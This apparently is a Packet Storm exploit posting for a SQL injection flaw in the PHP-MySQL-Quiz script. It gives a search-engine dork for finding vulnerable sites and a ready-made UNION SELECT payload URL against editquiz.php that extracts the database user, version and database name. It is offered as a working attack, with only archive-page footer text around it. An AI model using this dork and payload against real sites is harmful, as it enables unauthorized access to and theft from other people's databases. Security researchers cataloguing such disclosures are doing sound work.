PHP-MySQL-Quiz suffers from a remote SQL injection vulnerability.
c27253ca329fd9d8a8b0b4ce1687817837e43bcb85b304e3ef6bb4417b04b8e1# PHP-MySQL-Quiz SQL Injection Vulnerability
#
# Author: Hussin X
# Home : www.iq-ty.com<http://www.iq-ty.com>
# email: darkangel_g85[at]Yahoo[DoT]com
##########################################################
# HomE script : http://www.widgetmonkey.com/
# Download : http://www.getfreesofts.com/script_download.php?id=18744&id_1=881
# DorK : inurl:quizinfo.php
Exploit:
http://www.site.com/Script/editquiz.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8--
IQ-SecuritY FoRuM
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed